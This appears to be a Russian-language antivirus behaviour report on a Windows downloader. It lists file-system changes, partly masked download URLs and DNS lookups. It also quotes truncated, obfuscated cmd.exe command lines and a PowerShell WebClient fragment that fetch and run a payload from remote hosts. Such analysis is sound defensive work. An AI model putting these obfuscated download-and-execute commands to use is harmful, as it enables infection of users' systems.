Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set eLO6=N1qVndw~20kzGl(eD.Y;b9p\\TvBW+=5ouI-8rtZ@OsE:FPM}$UL4yJ)ij h6xg'mfCcH%3{SA,a&&for %Z in (22,32,6,69,46,50,27,51,34,66,44,7,31,74,1,69,37...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\63.exe
Удаляет следующие файлы
- %TEMP%\63.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://fb##z.com/COeg4ZZ
- http://th#####venuequan2.com/UYUiGwf9j
- http://ww##.###sunavenuequan2.com/UYUiGwf9j?su#########################################
- http://dr##art.org/Jvn89HTd2O
UDP
- DNS ASK sa#####ighroddis.com
- DNS ASK fb##z.com
- DNS ASK th#####venuequan2.com
- DNS ASK ww##.###sunavenuequan2.com
- DNS ASK dr##art.org
- DNS ASK ik##.iniqua.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:ON\C"set eLO6=N1qVndw~20kzGl(eD.Y;b9p\\TvBW+=5ouI-8rtZ@OsE:FPM}$UL4yJ)ij h6xg'mfCcH%3{SA,a&&for %Z in (22,32,6,69,46,50,27,51,34,66,44,7,31,74,1,69,37...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:ON/C"set eLO6=N1qVndw~20kzGl(eD.Y;b9p\/TvBW+=5ouI-8rtZ@OsE:FPM}$UL4yJ)ij h6xg'mfCcH%3{SA,a&&for %Z in (22,32,6,69,46,50,27,51,34,66,44,7,31,74,1,69,37,69,72,43,72,72,34,41,0,0,73,47,43,44,7,...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $iiis='ujwd';$fnvq=new-object Net.WebClient;$hpthn='http://sa#####ighroddis.com/xZs22v11@http://fbroz.com/COeg4ZZ@http://thesu...
- '<SYSTEM32>\cmd.exe'
